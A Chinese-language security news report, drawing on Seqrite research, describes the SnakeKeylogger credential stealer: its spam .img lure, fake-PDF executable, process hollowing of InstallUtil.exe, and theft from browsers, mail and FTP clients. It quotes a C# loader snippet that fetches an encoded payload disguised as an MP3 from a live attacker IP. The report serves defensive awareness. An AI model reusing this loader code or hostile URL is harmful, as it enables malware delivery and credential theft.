SnakeKeylogger 已成为一种复杂的窃取凭据恶意软件,凭借其多阶段感染链和隐蔽的内存执行技术,对个人和组织发起攻击。
这种恶意软件专门用于在不被传统安全措施察觉的情况下收集敏感登录凭据,在当今数字化环境中极具危险性。
其初始感染途径是一封包含磁盘镜像(.img)文件附件的恶意垃圾邮件。打开该文件后,会创建一个虚拟驱动器,其中有一个伪装成 PDF 文档的可执行文件。
这个伪装的可执行文件的图标和名称经过精心设计,看起来像重要的业务文档,增加了收件人毫无戒心地打开它的可能性。
SnakeKeylogger 尤其令人担忧的是其系统的数据收集方式。
该恶意软件瞄准存储在网络浏览器、电子邮件客户端、FTP 应用程序中的凭据,甚至从受感染系统中提取 WiFi 密码。
一旦收集到这些敏感信息,就会被传输到攻击者控制的服务器。
Seqrite 的研究人员发现,SnakeKeylogger 采用了一种复杂的多阶段感染技术来增强其隐蔽能力。
攻击链
他们的分析显示,该恶意软件能够下载加密的有效载荷并直接在内存中执行,从而避开基于磁盘的检测方法。
感染链始于第一阶段加载器连接到远程服务器,获取看似 MP3 文件但实际上是编码有效载荷的内容。
恶意软件代码的一个关键部分揭示了这种欺骗手段:
private static byte[] Goakadr(){
using (HttpClient httpClient = new HttpClient())
{
Stream result = httpClient.GetStreamAsync(new Uri(“http://103.72.56.30/PHANTOM/Xawnb.mp3”)).Result;
using (MemoryStream memoryStream = new MemoryStream())
{
result.CopyTo(memoryStream);
array = memoryStream.ToArray();
}
}}
这个初始有效载荷随后被解密,并通过一种称为进程空洞化的技术注入到合法的 Windows 进程中。
该恶意软件专门针对 InstallUtil.exe,这是一个合法的.NET Framework 实用程序,它会掏空该程序的内存并用恶意代码替换。通过在受信任的 Windows 进程内执行,SnakeKeylogger 能够更有效地躲避安全防护措施。
注入的代码随后开始系统地从 30 多种不同的网络浏览器、如 Outlook 和 Thunderbird 等电子邮件客户端、如 FileZilla 等 FTP 应用程序以及即时通讯平台收集凭据。
浏览器目标列表不仅包括主流浏览器,还包括一些地区性和不太常见的变体,显示出攻击者手段的全面性。
发表评论
您还未登录,请先登录。
登录